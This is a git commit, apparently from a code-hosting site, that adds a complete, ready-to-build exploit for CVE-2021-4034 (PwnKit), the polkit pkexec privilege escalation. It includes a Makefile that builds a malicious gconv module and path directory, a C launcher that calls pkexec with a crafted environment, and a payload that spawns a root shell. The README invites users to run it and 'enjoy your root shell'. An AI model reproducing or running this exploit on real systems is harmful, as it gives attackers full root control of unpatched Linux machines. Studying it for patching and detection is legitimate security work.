CVE-2021-4034

This commit is contained in:
Davide Berardi 2022-01-26 01:03:31 +01:00
parent 1dabffa709
commit 444257e5d9
4 changed files with 55 additions and 1 deletions

19
Makefile Normal file
View File

@ -0,0 +1,19 @@
CFLAGS=-Wall
.PHONY: all
all: pwnkit.so cve-2021-4034 gconv-modules gconvpath
.PHONY: clean
clean:
rm -rf pwnkit.so cve-2021-4034 gconv-modules GCONV_PATH=./
gconv-modules:
echo "module UTF-8// PWNKIT// pwnkit 1" > $@
.PHONY: gconvpath
gconvpath:
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
pwnkit.so: pwnkit.c
$(CC) $(CFLAGS) --shared -fPIC -o $@ $<

View File

@ -1,2 +1,6 @@
# CVE-2021-4034 # CVE-2021-4034
CVE-2021-4034 1day One day for the polkit privilege escalation exploit
Just execute `make`, `./cve-2021-4034` and enjoy your root shell.
The original advisory by the real authors is [here](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)

16
cve-2021-4034.c Normal file
View File

@ -0,0 +1,16 @@
#include <unistd.h>
int main(int argc, char **argv)
{
char * const args[] = {
NULL
};
char * const environ[] = {
"pwnkit.so:.",
"PATH=GCONV_PATH=.",
"SHELL=/lol/i/do/not/exists",
"CHARSET=PWNKIT",
NULL
};
return execve("/usr/bin/pkexec", args, environ);
}

15
pwnkit.c Normal file
View File

@ -0,0 +1,15 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void gconv(void) {
}
void gconv_init(void *step)
{
char * const args[] = { "/bin/sh", "-pi", NULL };
char * const environ[] = { "PATH=/bin:/usr/bin", NULL };
printf("%d %d\n", getuid(), geteuid());
execve(args[0], args, environ);
exit(0);
}